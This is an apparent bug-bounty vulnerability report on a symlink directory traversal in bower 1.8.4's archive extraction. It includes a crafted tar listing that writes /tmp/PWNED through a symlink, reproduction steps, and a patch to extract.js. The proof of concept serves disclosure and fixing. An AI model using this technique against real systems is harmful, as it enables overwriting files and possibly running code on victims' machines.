I would like to report file write in arbitrary locations via install command in bower
It allows attackers to write arbitrary files when a malicious package is extracted.

Module

module name: bowerversion:1.8.4npm page: https://www.npmjs.com/package/bower

Module Description

Bower offers a generic, unopinionated solution to the problem of front-end package management, while exposing the package dependency model via an API that can be consumed by a more opinionated build stack. There are no system wide dependencies, no dependencies are shared between different apps, and the dependency tree is flat.

Module Stats

weekly downloads
175,693

Vulnerability

Vulnerability Description

Quoting from #362118

>The vulnerability is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

When we install a package that is in the tar archive format using bower, it tries to extract the package first. Bower installer attempts to prevent a package from writing any files outside the install directory; however it is possible to bypass the check with a symbolic link in a crafted npm package.

Example structure of malicious npm package:

$ tar -xvf hello.tar.gz
hello/
hello/README.md
hello/link
hello/link/PWNED
hello/package.json

$ tar -tvf hello.tar.gz
drwxr-xr-x 0/0               0 2019-01-01 21:27 hello/
-rw-r--r-- 0/0              12 2019-01-01 21:27 hello/README.md
lrw-r--r-- 0/0               0 2019-01-01 21:27 hello/link -> /tmp
-rw-r--r-- 0/0              15 2019-01-01 21:27 hello/link/PWNED
-rw-r--r-- 0/0             102 2019-01-01 21:27 hello/package.json

Steps To Reproduce:

Using attached file hello.tar.gz

$ bower install ./hello.tar.gz
bower hello.tar#*                 copy /home/path/hello.tar.gz
bower hello.tar#*              extract hello.tar.gz
bower hello.tar#*             resolved /home/path/hello.tar.gz
bower hello.tar#*              install hello.tar

This creates a file /tmp/PWNED which is a sufficient PoC

Patch

I’m fully aware that bower has been deprecated and using yarn is advised. Therefore, I would recommend releasing an advisory if a patch might not be possible.

The vulnerability lies in extract.js

function isSymlink(entry) {
    return entry.type === 'SymbolicLink';
}

According to the docs of tar-fs making following changes will work in order to properly ignore symlinks

- function isSymlink(entry) {
+ function isSymlink(_, entry) {
-     return entry.type === 'SymbolicLink';
+    return entry.type === 'symlink';
}

Supporting Material/References:

> State all technical information about the stack where the vulnerability was found

• Ubuntu 16.04
• Node v11.3.0
• Bower 1.8.4

Wrap up

• I contacted the maintainer to let them know: N
• I opened an issue in the related repository: N

> Hunter’s comments and funny memes goes here

{F399574}

Impact

Writing arbitrary files on the system